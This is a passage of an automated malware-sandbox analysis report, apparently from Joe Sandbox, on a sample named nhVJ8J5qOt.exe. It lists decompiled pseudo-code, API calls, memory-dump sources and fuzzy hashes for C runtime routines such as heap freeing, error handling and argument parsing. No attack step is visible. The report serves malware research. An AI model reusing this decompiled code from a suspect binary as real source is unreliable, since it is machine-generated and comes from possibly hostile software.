                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0037A7F4
                                                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0037A806
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 0037A80F
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BF3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0037A7C2,00000000), ref: 0037BF6E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 313313983-0
                                                                                                                                                                                                                                                                            • Opcode ID: c16be6a4a06bf54e71ffbfe08688f7937e1a88fe6ea268928c85233a8bf08dac
                                                                                                                                                                                                                                                                            • Instruction ID: 210fe58e1d02932e5cef8d5a9ebcca026560a599383d9398337a2f19fe1882c3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c16be6a4a06bf54e71ffbfe08688f7937e1a88fe6ea268928c85233a8bf08dac
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A31A072A0060AABDB368F64CC45DAF7BB5EB80710F158169FC08DA250E739DD55CB92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                                                            			E00379ED4(void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				intOrPtr _t2;
                                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                                                            				long _t17;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                                                            				_t17 = GetLastError();
                                                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                                                            				_t2 =  *0x40d4dc; // 0x2
                                                                                                                                                                                                                                                                            				_t20 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                                            				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                                                            					_t16 = E0037A89E(_t11, 1, 0x364);
                                                                                                                                                                                                                                                                            					_pop(_t13);
                                                                                                                                                                                                                                                                            					if(_t16 != 0) {
                                                                                                                                                                                                                                                                            						_t4 = E0037AB4E(_t13, _t17, __eflags,  *0x40d4dc, _t16);
                                                                                                                                                                                                                                                                            						__eflags = _t4;
                                                                                                                                                                                                                                                                            						if(_t4 != 0) {
                                                                                                                                                                                                                                                                            							E00379CC2(_t13, _t16, 0x40dd14);
                                                                                                                                                                                                                                                                            							E0037A8FB(_t10);
                                                                                                                                                                                                                                                                            							__eflags = _t16;
                                                                                                                                                                                                                                                                            							if(_t16 != 0) {
                                                                                                                                                                                                                                                                            								goto L9;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								goto L8;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_push(_t16);
                                                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_push(_t10);
                                                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                                                            						E0037A8FB();
                                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                                            						SetLastError(_t17);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t16 = E0037AAF8(_t11, _t17, _t20, _t2);
                                                                                                                                                                                                                                                                            					if(_t16 != 0) {
                                                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                                                            						SetLastError(_t17);
                                                                                                                                                                                                                                                                            						_t10 = _t16;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t10;
                                                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                                                            0x00379ed4
                                                                                                                                                                                                                                                                            0x00379edf
                                                                                                                                                                                                                                                                            0x00379ee1
                                                                                                                                                                                                                                                                            0x00379ee3
                                                                                                                                                                                                                                                                            0x00379ee8
                                                                                                                                                                                                                                                                            0x00379eeb
                                                                                                                                                                                                                                                                            0x00379ef9
                                                                                                                                                                                                                                                                            0x00379f05
                                                                                                                                                                                                                                                                            0x00379f08
                                                                                                                                                                                                                                                                            0x00379f0b
                                                                                                                                                                                                                                                                            0x00379f1d
                                                                                                                                                                                                                                                                            0x00379f22
                                                                                                                                                                                                                                                                            0x00379f24
                                                                                                                                                                                                                                                                            0x00379f2f
                                                                                                                                                                                                                                                                            0x00379f35
                                                                                                                                                                                                                                                                            0x00379f3d
                                                                                                                                                                                                                                                                            0x00379f3f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00379f26
                                                                                                                                                                                                                                                                            0x00379f26
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00379f26
                                                                                                                                                                                                                                                                            0x00379f0d
                                                                                                                                                                                                                                                                            0x00379f0d
                                                                                                                                                                                                                                                                            0x00379f0e
                                                                                                                                                                                                                                                                            0x00379f0e
                                                                                                                                                                                                                                                                            0x00379f41
                                                                                                                                                                                                                                                                            0x00379f42
                                                                                                                                                                                                                                                                            0x00379f42
                                                                                                                                                                                                                                                                            0x00379eed
                                                                                                                                                                                                                                                                            0x00379ef3
                                                                                                                                                                                                                                                                            0x00379ef7
                                                                                                                                                                                                                                                                            0x00379f4a
                                                                                                                                                                                                                                                                            0x00379f4b
                                                                                                                                                                                                                                                                            0x00379f51
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00379ef7
                                                                                                                                                                                                                                                                            0x00379f58

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00379A4B,0037A8F0,?,00379E7E,00000001,00000364,?,00374DA8,?), ref: 00379ED9
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379F0E
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379F35
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 00379F42
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 00379F4B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                            • Opcode ID: 55100d25bdf931f614736168f0d39ee2fb950bb408883df9c884a8462edb7630
                                                                                                                                                                                                                                                                            • Instruction ID: 61c32d09c97e42e1e7f04ffb0d203e81939297635a226b5e0e3428d67e08fa9a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55100d25bdf931f614736168f0d39ee2fb950bb408883df9c884a8462edb7630
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71012636208B01BAD23322645C85B1E265D9BC67627318227F40DE6291EE3CC8098262
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E0037BDB3(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t21 = _a4;
                                                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                                                            					_t23 =  *_t21 -  *0x40dae0; // 0x40dad8
                                                                                                                                                                                                                                                                            					if(_t23 != 0) {
                                                                                                                                                                                                                                                                            						E0037A8FB(_t7);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x40dae4; // 0x40df51
                                                                                                                                                                                                                                                                            					if(_t24 != 0) {
                                                                                                                                                                                                                                                                            						E0037A8FB(_t8);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x40dae8; // 0x40df51
                                                                                                                                                                                                                                                                            					if(_t25 != 0) {
                                                                                                                                                                                                                                                                            						E0037A8FB(_t9);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x40db10; // 0x40dadc
                                                                                                                                                                                                                                                                            					if(_t26 != 0) {
                                                                                                                                                                                                                                                                            						E0037A8FB(_t10);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                                                                                                                                                                                                                            					_t27 = _t6 -  *0x40db14; // 0x40df54
                                                                                                                                                                                                                                                                            					if(_t27 != 0) {
                                                                                                                                                                                                                                                                            						return E0037A8FB(_t6);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t6;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x0037bdb9
                                                                                                                                                                                                                                                                            0x0037bdbe
                                                                                                                                                                                                                                                                            0x0037bdc2
                                                                                                                                                                                                                                                                            0x0037bdc8
                                                                                                                                                                                                                                                                            0x0037bdcb
                                                                                                                                                                                                                                                                            0x0037bdd0
                                                                                                                                                                                                                                                                            0x0037bdd4
                                                                                                                                                                                                                                                                            0x0037bdda
                                                                                                                                                                                                                                                                            0x0037bddd
                                                                                                                                                                                                                                                                            0x0037bde2
                                                                                                                                                                                                                                                                            0x0037bde6
                                                                                                                                                                                                                                                                            0x0037bdec
                                                                                                                                                                                                                                                                            0x0037bdef
                                                                                                                                                                                                                                                                            0x0037bdf4
                                                                                                                                                                                                                                                                            0x0037bdf8
                                                                                                                                                                                                                                                                            0x0037bdfe
                                                                                                                                                                                                                                                                            0x0037be01
                                                                                                                                                                                                                                                                            0x0037be06
                                                                                                                                                                                                                                                                            0x0037be07
                                                                                                                                                                                                                                                                            0x0037be0a
                                                                                                                                                                                                                                                                            0x0037be10
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037be18
                                                                                                                                                                                                                                                                            0x0037be10
                                                                                                                                                                                                                                                                            0x0037be1b

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037BDCB
                                                                                                                                                                                                                                                                              • Part of subcall function 0037A8FB: HeapFree.KERNEL32(00000000,00000000,?,0037BE4A,?,00000000,?,00000000,?,0037BE71,?,00000007,?,?,0037AFE5,?), ref: 0037A911
                                                                                                                                                                                                                                                                              • Part of subcall function 0037A8FB: GetLastError.KERNEL32(?,?,0037BE4A,?,00000000,?,00000000,?,0037BE71,?,00000007,?,?,0037AFE5,?,?), ref: 0037A923
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037BDDD
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037BDEF
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037BE01
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037BE13
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0b0f207c730b3fcd03bb4cc2fc2dadd26b10d3666e7778173048a846816effc9
                                                                                                                                                                                                                                                                            • Instruction ID: 8cb99c074889377507db764976224cf5ef9baf917ae12c44a5329e5939da0415
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b0f207c730b3fcd03bb4cc2fc2dadd26b10d3666e7778173048a846816effc9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EAF01832604605FBC532DB98F585D5AB7F9AE44710B658815F04CF7A11CB38FCC18A55
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                                                            			E0038182C(signed int __ecx) {
                                                                                                                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                            				if((__ecx | 0xffffffff) == 0) {
                                                                                                                                                                                                                                                                            					_t7 =  *0x40dad0; // 0x14e39f8
                                                                                                                                                                                                                                                                            					if(_t7 != 0x40d8b0) {
                                                                                                                                                                                                                                                                            						E0037A8FB(_t7);
                                                                                                                                                                                                                                                                            						 *0x40dad0 = 0x40d8b0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E0037A8FB( *0x40e804);
                                                                                                                                                                                                                                                                            				 *0x40e804 = 0;
                                                                                                                                                                                                                                                                            				E0037A8FB( *0x40e808);
                                                                                                                                                                                                                                                                            				 *0x40e808 = 0;
                                                                                                                                                                                                                                                                            				E0037A8FB( *0x40e5e8);
                                                                                                                                                                                                                                                                            				 *0x40e5e8 = 0;
                                                                                                                                                                                                                                                                            				E0037A8FB( *0x40e5ec);
                                                                                                                                                                                                                                                                            				 *0x40e5ec = 0;
                                                                                                                                                                                                                                                                            				return 1;
                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                            0x00381835
                                                                                                                                                                                                                                                                            0x00381839
                                                                                                                                                                                                                                                                            0x0038183b
                                                                                                                                                                                                                                                                            0x00381847
                                                                                                                                                                                                                                                                            0x0038184a
                                                                                                                                                                                                                                                                            0x00381850
                                                                                                                                                                                                                                                                            0x00381850
                                                                                                                                                                                                                                                                            0x00381847
                                                                                                                                                                                                                                                                            0x0038185c
                                                                                                                                                                                                                                                                            0x00381869
                                                                                                                                                                                                                                                                            0x0038186f
                                                                                                                                                                                                                                                                            0x0038187a
                                                                                                                                                                                                                                                                            0x00381880
                                                                                                                                                                                                                                                                            0x0038188b
                                                                                                                                                                                                                                                                            0x00381891
                                                                                                                                                                                                                                                                            0x00381899
                                                                                                                                                                                                                                                                            0x003818a2

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0038184A
                                                                                                                                                                                                                                                                              • Part of subcall function 0037A8FB: HeapFree.KERNEL32(00000000,00000000,?,0037BE4A,?,00000000,?,00000000,?,0037BE71,?,00000007,?,?,0037AFE5,?), ref: 0037A911
                                                                                                                                                                                                                                                                              • Part of subcall function 0037A8FB: GetLastError.KERNEL32(?,?,0037BE4A,?,00000000,?,00000000,?,0037BE71,?,00000007,?,?,0037AFE5,?,?), ref: 0037A923
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0038185C
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0038186F
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00381880
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00381891
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: d66241fb0c6f384eb5c4ef27936822dfe02a2811850f13dd7aebf1dec38e6f01
                                                                                                                                                                                                                                                                            • Instruction ID: b6bbc05ce03093e30ef9a7f9ba3169041a92653ef69e969b72a36b41e1f3d902
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d66241fb0c6f384eb5c4ef27936822dfe02a2811850f13dd7aebf1dec38e6f01
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CEF03071804611AFD6167F55BE064483B64EB04720B158D36F41677371DB3404A28F9E
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                                                            			E003811F5(intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				intOrPtr* _t35;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t42;
                                                                                                                                                                                                                                                                            				intOrPtr* _t43;
                                                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                                                            				WCHAR* _t48;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t49;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t53;
                                                                                                                                                                                                                                                                            				intOrPtr* _t56;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t61;
                                                                                                                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(_a4 == 2 || _a4 == 1) {
                                                                                                                                                                                                                                                                            					GetModuleFileNameW(0, 0x40e3c0, 0x104);
                                                                                                                                                                                                                                                                            					_t48 =  *0x40e5f4; // 0x14d0fde
                                                                                                                                                                                                                                                                            					 *0x40e5f8 = 0x40e3c0;
                                                                                                                                                                                                                                                                            					if(_t48 == 0 ||  *_t48 == 0) {
                                                                                                                                                                                                                                                                            						_t48 = 0x40e3c0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                                                                                                                            					E00381314(_t48, 0, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                                                                            					_t61 = E0038149A(_v8, _v16, 2);
                                                                                                                                                                                                                                                                            					if(_t61 != 0) {
                                                                                                                                                                                                                                                                            						E00381314(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                                                                                                                                                                                                                                                                            						if(_a4 != 1) {
                                                                                                                                                                                                                                                                            							_v12 = 0;
                                                                                                                                                                                                                                                                            							_push( &_v12);
                                                                                                                                                                                                                                                                            							_t49 = E00381EDE(_t48, 0, _t61, _t61);
                                                                                                                                                                                                                                                                            							if(_t49 == 0) {
                                                                                                                                                                                                                                                                            								_t56 = _v12;
                                                                                                                                                                                                                                                                            								_t53 = 0;
                                                                                                                                                                                                                                                                            								_t35 = _t56;
                                                                                                                                                                                                                                                                            								if( *_t56 == 0) {
                                                                                                                                                                                                                                                                            									L15:
                                                                                                                                                                                                                                                                            									_t36 = 0;
                                                                                                                                                                                                                                                                            									 *0x40e5e4 = _t53;
                                                                                                                                                                                                                                                                            									_v12 = 0;
                                                                                                                                                                                                                                                                            									_t49 = 0;
                                                                                                                                                                                                                                                                            									 *0x40e5ec = _t56;
                                                                                                                                                                                                                                                                            									L16:
                                                                                                                                                                                                                                                                            									E0037A8FB(_t36);
                                                                                                                                                                                                                                                                            									_v12 = 0;
                                                                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                                                            									L14:
                                                                                                                                                                                                                                                                            									_t35 = _t35 + 4;
                                                                                                                                                                                                                                                                            									_t53 =  &(_t53->i);
                                                                                                                                                                                                                                                                            								} while ( *_t35 != 0);
                                                                                                                                                                                                                                                                            								goto L15;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t36 = _v12;
                                                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *0x40e5e4 = _v8 - 1;
                                                                                                                                                                                                                                                                            						_t42 = _t61;
                                                                                                                                                                                                                                                                            						_t61 = 0;
                                                                                                                                                                                                                                                                            						 *0x40e5ec = _t42;
                                                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t43 = E00379A46();
                                                                                                                                                                                                                                                                            						_push(0xc);
                                                                                                                                                                                                                                                                            						_pop(0);
                                                                                                                                                                                                                                                                            						 *_t43 = 0;
                                                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                                                            						_t49 = 0;
                                                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                                                            						E0037A8FB(_t61);
                                                                                                                                                                                                                                                                            						return _t49;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t44 = E00379A46();
                                                                                                                                                                                                                                                                            					_t62 = 0x16;
                                                                                                                                                                                                                                                                            					 *_t44 = _t62;
                                                                                                                                                                                                                                                                            					E0037998A();
                                                                                                                                                                                                                                                                            					return _t62;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                                                            0x00381202
                                                                                                                                                                                                                                                                            0x00381230
                                                                                                                                                                                                                                                                            0x00381236
                                                                                                                                                                                                                                                                            0x0038123c
                                                                                                                                                                                                                                                                            0x00381244
                                                                                                                                                                                                                                                                            0x0038124b
                                                                                                                                                                                                                                                                            0x0038124b
                                                                                                                                                                                                                                                                            0x00381250
                                                                                                                                                                                                                                                                            0x00381257
                                                                                                                                                                                                                                                                            0x0038125e
                                                                                                                                                                                                                                                                            0x00381270
                                                                                                                                                                                                                                                                            0x00381277
                                                                                                                                                                                                                                                                            0x00381296
                                                                                                                                                                                                                                                                            0x003812a2
                                                                                                                                                                                                                                                                            0x003812bd
                                                                                                                                                                                                                                                                            0x003812c0
                                                                                                                                                                                                                                                                            0x003812c7
                                                                                                                                                                                                                                                                            0x003812cd
                                                                                                                                                                                                                                                                            0x003812d4
                                                                                                                                                                                                                                                                            0x003812d7
                                                                                                                                                                                                                                                                            0x003812d9
                                                                                                                                                                                                                                                                            0x003812dd
                                                                                                                                                                                                                                                                            0x003812e7
                                                                                                                                                                                                                                                                            0x003812e7
                                                                                                                                                                                                                                                                            0x003812e9
                                                                                                                                                                                                                                                                            0x003812ef
                                                                                                                                                                                                                                                                            0x003812f2
                                                                                                                                                                                                                                                                            0x003812f4
                                                                                                                                                                                                                                                                            0x003812fa
                                                                                                                                                                                                                                                                            0x003812fb
                                                                                                                                                                                                                                                                            0x00381301
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003812df
                                                                                                                                                                                                                                                                            0x003812df
                                                                                                                                                                                                                                                                            0x003812df
                                                                                                                                                                                                                                                                            0x003812e2
                                                                                                                                                                                                                                                                            0x003812e3
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003812df
                                                                                                                                                                                                                                                                            0x003812cf
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003812cf
                                                                                                                                                                                                                                                                            0x003812a8
                                                                                                                                                                                                                                                                            0x003812ad
                                                                                                                                                                                                                                                                            0x003812af
                                                                                                                                                                                                                                                                            0x003812b1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381279
                                                                                                                                                                                                                                                                            0x00381279
                                                                                                                                                                                                                                                                            0x0038127e
                                                                                                                                                                                                                                                                            0x00381280
                                                                                                                                                                                                                                                                            0x00381281
                                                                                                                                                                                                                                                                            0x003812b6
                                                                                                                                                                                                                                                                            0x003812b6
                                                                                                                                                                                                                                                                            0x00381304
                                                                                                                                                                                                                                                                            0x00381305
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0038130e
                                                                                                                                                                                                                                                                            0x0038120a
                                                                                                                                                                                                                                                                            0x0038120a
                                                                                                                                                                                                                                                                            0x00381211
                                                                                                                                                                                                                                                                            0x00381212
                                                                                                                                                                                                                                                                            0x00381214
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381219

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\nhVJ8J5qOt.exe,00000104), ref: 00381230
